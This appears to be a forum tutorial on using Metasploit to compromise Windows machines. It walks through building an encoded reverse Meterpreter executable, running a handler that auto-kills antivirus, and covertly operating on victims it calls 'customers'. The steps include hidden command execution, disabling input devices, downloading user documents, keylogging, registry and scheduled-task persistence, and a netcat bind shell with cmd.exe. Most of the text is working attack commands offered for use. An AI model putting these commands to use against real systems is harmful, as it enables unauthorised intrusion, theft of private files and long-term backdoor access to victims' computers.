I introduce my tutorial on the Metasploit Framework. This applys to both Linux and Windows.
Although, I would seriously suggest using Metasploit within Linux, specifically
'Backtrack 4 - PreRelease' (The Latest)
If you dont know what the metasploit framework is, then look it up. You've been missing out.
In no way is this meant to be a comprehensive guide. MSF is HUGE. Too many things can be done with it,
you could write 15 books on it. MSF is Open Source and coded in the Ruby language.
Get used to the 'help' option!
I'm gonna start with Payloads, many people know already that MSF is an exploitation framework, as in you can
work out vulnerabilities in software, and use the framework to quickly create working exploits for it.
There's hundreds of payloads that you can choose from, so that when you exploit the system in question
you can easily automate the execution of a payload of your choice on the machine.
I will show you how to turn those payloads into an actual .EXE so it will just run as is.
Ok. Lets begin:
Fire up your MSF, make sure it's updated, as they are constantly making amendments to this.
For backtrack i think its : cd pentest/exploits/framework3
Metasploit Double Encoded Reverse Meterpreter Payload
$ ./msfpayload windows/meterpreter/reverse_tcp LHOST=123.234.456.678 LPORT=82 R | ./msfencode -e x86/countdown -t raw | ./msfencode -t exe -o /meterpreter_reverse.exe
LHOST - is our machine (listening host, as we are waiting for a connection from RHOST (remote host)
LPORT - self explanitory. Just make sure you have port forwarding set up on your router ofcourse.
Meterpreter - An incredibly advanced shell which kind of simulates bash. (even on a win system) - lots of power.
You'll see how much power shorty.
Now you have your PAYLOAD.exe
In /framework3 directory
(Takes a lil minute for this to load)
use exploit/multi/handler (Sets the exploit to a handler)
set PAYLOAD windows/meterpreter/reverse_tcp (Most common Payload to use, try experimenting with others)
set LHOST 18.104.22.168 (Make sure you set LHOST to your address on Network and not localhost)
set LPORT 82 (Sometimes, port 80, 443 or 8080 is better as to some FW's it looks less suspicious)
set ExitOnSession false (As soon as you get a session, it doesn't automatically jump in to it)
set AutoRunScript /killav.rb (when customer connects back, and meterpreter payload is uploaded, killav.rb script is uploaded and executed)
exploit -j (sets exploit up as a job, good for shells on multiple customers)
(See more on scripts... down )
When all goes well, and you have hit 'exploit -j' and have waited for a customer to click on the payload.exe you created earlier
you will see stuff happening in the screen. You will notice it run the killab script, then says something like :
- Meterpreter session 1 opened (123.234.345.567:63456 -> 192.168.1.50:82)
Ok, here's the basics:
sessions -l (this lists any sessions we have i.e. customers. Notice the lowercase L )
sessions -i 1 (this is to interact with the session 1. i.e. Interect. Lowercase I)
If you need to come out of this screen. Either CTRL+Z or type 'background' without the ''
Ok.. So we are in the session: Brilliant
Continuation - The Good Stuff
$ Meterpreter > getuid (this will show you currently logged in user)
$ Meterpreter > idletime (wanna see how long user has afk?)
$ Meterpreter > help (this will show you a massive list of amzing commands to use!)
$ Meterpreter > use priv (then check help again, more privilidged commands now eh?
ok i will show some really handy ones
$ Meterpreter > upload evil.exe evil.exe (uploads the file from this machine over to the customer)
$ Meterpreter > download secret.txt secret.txt (downloads the txt file to our machine)
$ Meterpreter > cd "Documents and settings" (cd's to a folder with spaces in it.)
$ Meterpreter > ls (this is an example of the bash type commands we have on the target win machine, version of dir)
$ Meterpreter > download -r “My Documents” /home/root/Documents (This would download the entire "My Docs" folder over to us.
$ Meterpreter > execute *f evil.exe (executed the file on the customer)
$ Meterpreter > execute *f cmd.exe *c *H *i (-f executes, cmd.exe shell on target, channelized, hidden, interactive)
(customer will not see a thing your doing as all the options are set properly)
Check down the bottom for some useful cmd.exe commands that are very useful
$ Meterpreter > uictl disable keyboard (disables some user interface componants)
$ Meterpreter > uictl disable mouse
$ Meterpreter > uictl enable keyboard (enables)
$ Meterpreter > ps (this will show you a detailed list of all processes running on target machine)
$ Meterpreter > migrate pid (migrates/injects itself into another process id) e.g migrate 716 (explorer.exe)
$ Meterpreter > kill pid (kills process) e.g. kill 563 (av.exe goes down)
etc etc etc etc....
Using Payload As A Backdoor
upload /home/metabkdr.exe metabkdr.exe (to app data directory)
execute *-f cmd.exe *-c *-H -*i
Way 1 :
cmd.exe > REG add HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Run /v firewall /t REG_SZ /d "C:\Documents and Settings\Owner\Application Data\Microsoft\Installer\metabkdr.exe" /f
(This adds a registry startup obviously)
Way 2 :
cmd.exe > at 19:00 /every:M,T,W,Th,F cmd /c start "C:\Documents and Settings\Owner\Application Data\Microsoft\Installer\metabkdr.exe"
(runs backdoor at 7pm all weekdays, at command works for all windows i think)
way 3 :
cmd.exe > SCHTASKS /Create /RU "SYSTEM" /SC MINUTE /MO 45
/TN FIREWALL /TR "C:\Documents and Settings\Owner\Application Data\Microsoft\Ins
taller\metabkdr.exe" /ED 11/11/2011
(This runs the backdoor every 45 mins as SYSTEM (on XP. XP home doesnt have schtask, has 'at' though)
Plant A Simple Backdoor with Netcat
plant a backdoor
A very simple way of planting backdoor could be using netcat.
1. upload a netcat executable (nc.exe) on remote machine.
meterpreter provides a command 'upload' for that
2. c:\windows\system32 > nc.exe -l -L -p <port number> -e cmd.exe
3. now from your machine, type nc -v -n <ip address> <port>
It will give you a command shell of remote machine
nc -l -d -p 80 -e c:\windows\system32\cmd.exe
More On Scripts:
Scripts can be run from the meterpreter shell when you have a shell on a customer.
All you do is: (where '$' is not to be typed. This is the bash shell)
$ run scraper -h (This will show you the options etc for any of the scripts)
$ run keylogrecorder -h
The Sky is your limit when it comes to scripts. You can code them to do all sorts of stuff for you.
There are many already within the the framework, made by folk.. here's a small list of some already there:
killav.rb (kills all anti viruses running on system)
getcountermeasure.rb (kills av's and fw's/ids')
scraper.rb (logs LOADS of useful information via a serious of automated commands on customer. Logs stored in /root/.msf3/
gettelnet.rb (able to open a telnet server on the customer with a username and password)
checkvm.rb (checks to see if it is a VM. And version numbers)
Credits: backtrack forums / metasploit /irongeek